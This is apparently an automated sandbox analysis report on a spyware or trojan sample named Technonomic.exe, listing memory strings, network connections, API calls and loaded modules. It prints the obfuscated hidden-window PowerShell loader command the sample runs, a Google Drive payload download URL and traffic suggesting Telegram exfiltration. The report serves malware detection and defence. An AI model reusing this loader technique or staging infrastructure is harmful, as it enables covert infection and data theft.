            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download
            Source: msiexec.exe, 00000007.00000002.2606714921.0000000009F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download%-
            Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download1-
            Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=downloade
            Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=downloadle
            Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=downloado.
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025865000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000259DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000259D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.9:49859 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49866 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49962 version: TLS 1.2
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405421

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exeJump to dropped file
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\Technonomic.exeFile created: C:\Windows\resources\unthick.iniJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004068470_2_00406847
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_00404C5E0_2_00404C5E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A53627_2_032A5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AD2787_2_032AD278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AC1467_2_032AC146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AC7387_2_032AC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AC4687_2_032AC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032ACA087_2_032ACA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AE9887_2_032AE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032ACFAB7_2_032ACFAB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A3E097_2_032A3E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032ACCD87_2_032ACCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A71187_2_032A7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AA0887_2_032AA088
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A3AA17_2_032A3AA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AF9617_2_032AF961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032AE97B7_2_032AE97B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A39EE7_2_032A39EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A29EC7_2_032A29EC
            Source: Technonomic.exeStatic PE information: invalid certificate
            Source: Technonomic.exe, 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameharbinger.exeJ vs Technonomic.exe
            Source: Technonomic.exeBinary or memory string: OriginalFilenameharbinger.exeJ vs Technonomic.exe
            Source: Technonomic.exe.2.drBinary or memory string: OriginalFilenameharbinger.exeJ vs Technonomic.exe
            Source: Technonomic.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@5/5
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E2
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\Technonomic.exeFile created: C:\Users\user\AppData\Local\magmaetJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Technonomic.exeFile created: C:\Users\user\AppData\Local\Temp\nse22EC.tmpJump to behavior
            Source: Technonomic.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Technonomic.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Technonomic.exeReversingLabs: Detection: 44%
            Source: C:\Users\user\Desktop\Technonomic.exeFile read: C:\Users\user\Desktop\Technonomic.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Technonomic.exe "C:\Users\user\Desktop\Technonomic.exe"
            Source: C:\Users\user\Desktop\Technonomic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Technonomic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeFile written: C:\Windows\Resources\unthick.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Technonomic.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000007.00000002.2598654434.000000000651E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Erni $Femhundredkroneseddels $Engangsdebitor), (Utmmelige226 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fnokurterne = [AppDomain]::CurrentDomain.GetAs
